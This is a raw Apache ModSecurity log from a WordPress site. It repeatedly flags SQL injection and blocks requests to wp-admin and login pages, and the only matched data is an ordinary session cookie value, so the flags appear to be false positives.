[Mon May 11 18:32:39.726401 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEpzJnyuKVXoStDhbidAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:39.726704 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEpzJnyuKVXoStDhbidAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:40.344052 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEpzJnyuKVXoStDhbidAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:40.592178 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEqDJnyuKVXoStDhbidQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:40.592478 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEqDJnyuKVXoStDhbidQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:41.159615 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEqDJnyuKVXoStDhbidQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:41.304386 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEqTJnyuKVXoStDhbidgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:41.304672 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEqTJnyuKVXoStDhbidgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.037973 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEqTJnyuKVXoStDhbidgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.139732 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEqjJnyuKVXoStDhbieAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.140021 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEqjJnyuKVXoStDhbieAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.512832 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEqjJnyuKVXoStDhbieAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.758338 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEqjJnyuKVXoStDhbieQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:42.758653 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEqjJnyuKVXoStDhbieQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:43.405732 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEqjJnyuKVXoStDhbieQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:43.687633 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEqzJnyuKVXoStDhbiegAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:43.687934 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEqzJnyuKVXoStDhbiegAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:44.327746 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEqzJnyuKVXoStDhbiegAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:44.581843 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIErDJnyuKVXoStDhbifAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:44.582133 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIErDJnyuKVXoStDhbifAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:45.181333 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIErDJnyuKVXoStDhbifAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:45.433788 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIErTJnyuKVXoStDhbifgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:45.434078 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIErTJnyuKVXoStDhbifgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:45.977412 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIErTJnyuKVXoStDhbifgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:46.165889 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIErjJnyuKVXoStDhbifwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:46.166201 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIErjJnyuKVXoStDhbifwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:46.748492 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIErjJnyuKVXoStDhbifwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:46.907697 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIErjJnyuKVXoStDhbigQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:46.908000 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIErjJnyuKVXoStDhbigQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:47.275380 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIErjJnyuKVXoStDhbigQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:47.511905 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIErzJnyuKVXoStDhbiggAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:47.512207 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIErzJnyuKVXoStDhbiggAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:48.117731 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIErzJnyuKVXoStDhbiggAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:48.352889 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEsDJnyuKVXoStDhbihAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:48.353296 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEsDJnyuKVXoStDhbihAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:48.983253 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEsDJnyuKVXoStDhbihAAAAFM"], referer: https://rentparadise.fr/wp-login.php
